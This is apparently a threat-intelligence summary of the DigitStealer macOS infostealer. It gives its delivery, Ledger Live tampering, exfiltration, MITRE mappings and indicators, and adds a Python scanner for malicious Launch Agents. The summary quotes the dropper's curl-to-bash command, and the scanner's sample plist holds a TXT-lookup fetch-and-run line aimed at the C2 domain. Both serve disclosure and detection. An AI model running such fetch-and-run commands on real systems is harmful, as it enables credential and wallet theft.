Jamf Threat Labs analyzed a new macOS infostealer family named DigitStealer that uses unsigned disk images, multi-stage in-memory payloads, AppleScript/JXA, and hardware-based sysctl checks to target Apple Silicon M2+ systems and evade detection. The campaign modifies Ledger Live to redirect endpoints, exfiltrates credentials and files to attacker-controlled domains (notably goldenticketsshop[.]com), and achieves persistence via a Launch Agent that dynamically retrieves backdoor payloads. #DigitStealer #LedgerLive
Keypoints
- DigitStealer was delivered via unsigned disk images (example: DynamicLake.dmg) using a drag-to-terminal technique to bypass Gatekeeper and achieve initial execution.
- The dropper uses curl piped to bash and executes multiple in-memory payloads (osascript/JXA and bash), splitting functionality across four staged payloads to reduce detection.
- The malware includes novel hardware checks via sysctl to restrict execution to Apple Silicon M2 or newer (checks for FEAT_BTI, FEAT_SSBS, FEAT_ECV, FEAT_RPRES) and avoids VMs, Intel Macs, and M1 devices.
- Payloads collect and exfiltrate credentials, browser data, wallet files, Keychain DB, VPN configs and other user files to attacker-controlled endpoints (goldenticketsshop[.]com/api/credentials and /api/grabber).
- Actors tamper with Ledger Live by reconstructing and swapping app.asar from multiple parts and by modifying app.json to point Ledger Live to an attacker-controlled endpoint for wallet data theft.
- Persistence is implemented via a Launch Agent that fetches its payload dynamically from a TXT record on goldenticketsshop[.]com; a persistent JXA backdoor polls the C2 every ~10 seconds.
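A defender-side check for the persistence mechanism described in these key points, added here as an example and not taken from the Jamf post or the malware: it parses Launch Agent plists with Python's standard plistlib and flags login items whose command line shows fetch-at-login patterns (curl/wget piped to a shell, a DNS TXT lookup, osascript), plus the page's C2 domain. The function names, the pattern set and the sample plist are constructed assumptions for illustration.

```python
import os
import plistlib
import re

# Patterns drawn from the behaviours summarised above: the C2 domain is the page's
# own indicator; the other three are generic fetch-and-run idioms for a login item.
SUSPICIOUS = {
    "known C2 domain": re.compile(r"goldenticketsshop\.com", re.I),
    "curl/wget piped to a shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "DNS TXT lookup": re.compile(r"\b(dig|nslookup|host)\b.*\bTXT\b", re.I),
    "osascript/JXA at login": re.compile(r"\bosascript\b"),
}

def scan_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return finding names for one Launch Agent plist (empty list = nothing flagged)."""
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception:  # malformed content in a LaunchAgents dir is itself worth a look
        return ["unparseable plist"]
    args = plist.get("ProgramArguments", [])
    args = [str(plist.get("Program", ""))] + [str(a) for a in args]
    cmdline = " ".join(args)
    findings = [name for name, rx in SUSPICIOUS.items() if rx.search(cmdline)]
    if findings and plist.get("RunAtLoad"):
        findings.append("RunAtLoad=true")   # fires at every login, not just once
    return findings

def scan_directory(path: str) -> dict[str, list[str]]:
    """Scan every .plist under path (e.g. ~/Library/LaunchAgents); return flagged files."""
    results = {}
    for root, _dirs, files in os.walk(os.path.expanduser(path)):
        for name in files:
            full = os.path.join(root, name)
            if name.endswith(".plist"):
                with open(full, "rb") as fh:
                    hits = scan_launch_agent(fh.read())
                if hits:
                    results[full] = hits
    return results

# Constructed sample plist imitating a fetch-at-login agent (not taken from the page).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array><string>/bin/bash</string><string>-c</string>
    <string>dig +short TXT goldenticketsshop.com | xargs curl -fsSL | bash</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
```

On a Mac, `scan_directory("~/Library/LaunchAgents")` returns the flagged plists keyed by path; `scan_launch_agent(SAMPLE_PLIST)` flags the constructed sample on four counts.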
MITRE Techniques
- [T1204] User Execution (Malicious File) – Initial delivery relies on a user drag-to-terminal action to override Gatekeeper and run the installer. [‘leveraging the familiar drag-to-terminal technique to override Gatekeeper and gain initial code execution.’]
- [T1105] Ingress Tool Transfer – The dropper retrieves multiple remote payloads using curl and writes/executes them in memory. [‘curl -fsSL https[:]//67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx| bash’]
- [T1059] Command and Scripting Interpreter – Malware executes code via bash, osascript (AppleScript) and JXA to perform theft and system modification. [‘each payload is executed in memory and passed directly to osascript, JavaScript for Automation (JXA), or bash.’]
- [T1555.003] Credentials from Password Stores: Keychain – The stealer collects Keychain database files for credential harvesting. [‘Keychain database from ~/Library/Keychains/login.keychain-db’]
- [T1041] Exfiltration Over C2 Channel – Stolen credentials and files are uploaded to attacker-controlled endpoints on goldenticketsshop[.]com. [‘Exfiltrates credentials and files to the attacker domain https[:]//goldenticketsshop[.]com using two endpoints: /api/credentials (credential submissions) and /api/grabber (file uploads)’]
- [T1547] Boot or Logon Autostart Execution – Persistence is achieved by dropping and loading a Launch Agent that dynamically fetches its payload at runtime. [‘drops and loads a persistence item in the form of a Launch Agent’]
Indicators of Compromise
- [File hash] Installer disk image SHA-256 – 5c73987e642b8f8067c2f2b92af9fd923c25b2ec (the listed value is 40 hex characters, i.e. SHA-1 length rather than the 64 of a SHA-256 digest; confirm the hash type against the source post before using it in detections)
- [Domain] Malicious distribution and C2 domains – dynamiclake[.]org, goldenticketsshop[.]com (typosquat of goldenticketshop[.]com)
- [URLs/Hosts] Payload hosting on Cloudflare Pages – 67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx and other pages.dev hosts
- [File names] Malicious installer and scripts – DynamicLake.dmg, Drag Into Terminal.msi (text file with curl command)
- [File paths] Targeted/local artifacts – ~/Library/Keychains/login.keychain-db, ~/Library/Application Support/Ledger Live/app.json
- [DNS/TXT record] Dynamic payload retrieval mechanism – TXT record hosted on goldenticketsshop[.]com that stores the endpoint from which the backdoor payload is fetched
Read more: https://www.jamf.com/blog/jtl-digitstealer-macos-infostealer-analysis/